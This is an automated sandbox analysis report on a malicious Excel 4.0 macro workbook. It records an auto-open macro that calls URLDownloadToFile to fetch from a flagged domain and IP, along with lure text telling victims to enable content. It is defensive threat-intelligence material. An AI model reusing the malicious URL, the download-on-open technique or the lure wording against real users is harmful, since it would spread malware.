Loading ...

Play interactive tourEdit tour

Analysis Report Documents_1605962083_895739149.xlsm

Overview

General Information

Sample Name:Documents_1605962083_895739149.xlsm
Analysis ID:382679
MD5:77941203a3ef209ec6b53d47f0b6d5c0
SHA1:a2c4f211a8007a6c1def18ab10722edd235a5a70
SHA256:05ec137601fe0cb3bb5605a55df59e9e03cff966b43e545910cd12030bfca456
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Found Excel 4.0 Macro with suspicious formulas
Excel documents contains an embedded macro which executes code when the document is opened
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6224 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://sankhyasol.com/field.phpAvira URL Cloud: Label: malware
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
Source: global trafficDNS query: name: sankhyasol.com
Source: global trafficTCP traffic: 192.168.2.5:49703 -> 148.66.138.148:80
Source: global trafficTCP traffic: 192.168.2.5:49703 -> 148.66.138.148:80
Source: Joe Sandbox ViewIP Address: 148.66.138.148 148.66.138.148
Source: global trafficHTTP traffic detected: GET /field.php HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: sankhyasol.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /field.php HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: sankhyasol.comConnection: Keep-Alive
Source: unknownDNS traffic detected: queries for: sankhyasol.com
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://api.aadrm.com/
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://api.cortana.ai
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://api.office.net
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://api.onedrive.com
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://augloop.office.com
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://augloop.office.com/v2
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://cdn.entity.
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://clients.config.office.net/
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://config.edge.skype.com
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://cortana.ai
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://cortana.ai/api
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://cr.office.com
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://dev.cortana.ai
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://devnull.onenote.com
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://directory.services.
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://graph.windows.net
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://graph.windows.net/
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://lifecycle.office.com
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://login.windows.local
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://management.azure.com
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://management.azure.com/
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://messaging.office.com/
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://ncus.contentsync.
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://officeapps.live.com
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://onedrive.live.com
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://outlook.office.com/
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://outlook.office365.com/
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://settings.outlook.com
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://staging.cortana.ai
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://tasks.office.com
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://webshell.suite.office.com
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://wus2.contentsync.
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 0C794E1D-4401-4880-A309-2B416FE04208.0.drString found in binary or memory: https://www.odwebp.svc.ms

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. Protected View This fi
Source: Screenshot number: 4Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Source: Screenshot number: 8Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. Protected vkw This fil
Source: Screenshot number: 8Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start c'the decryption of the docume
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Documents_1605962083_895739149.xlsmInitial sample: CALL
Source: Documents_1605962083_895739149.xlsmInitial sample: CALL
Source: workbook.xmlBinary string: " sheetId="1" r:id="rId1"/><sheet name="Docs1" sheetId="2" r:id="rId2"/><sheet name="Docs2" sheetId="3" r:id="rId3"/><sheet name="Docs3" sheetId="4" r:id="rId4"/><sheet name="Docs4" sheetId="5" r:id="rId5"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Docs2!$BA$11</definedName></definedNames><calcPr calcId="0"/></workbook>
Source: classification engineClassification label: mal64.expl.evad.winXLSM@1/15@1/1
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{43E85A8D-7C01-4917-8B3F-7134D7D4FCB5} - OProcSessId.datJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Documents_1605962083_895739149.xlsmInitial sample: OLE zip file path = xl/media/image5.png
Source: Documents_1605962083_895739149.xlsmInitial sample: OLE zip file path = xl/media/image6.png
Source: Documents_1605962083_895739149.xlsmInitial sample: OLE zip file path = xl/media/image4.png
Source: Documents_1605962083_895739149.xlsmInitial sample: OLE zip file path = xl/media/image2.png
Source: Documents_1605962083_895739149.xlsmInitial sample: OLE zip file path = xl/media/image3.png
Source: Documents_1605962083_895739149.xlsmInitial sample: OLE zip file path = xl/media/image1.png
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
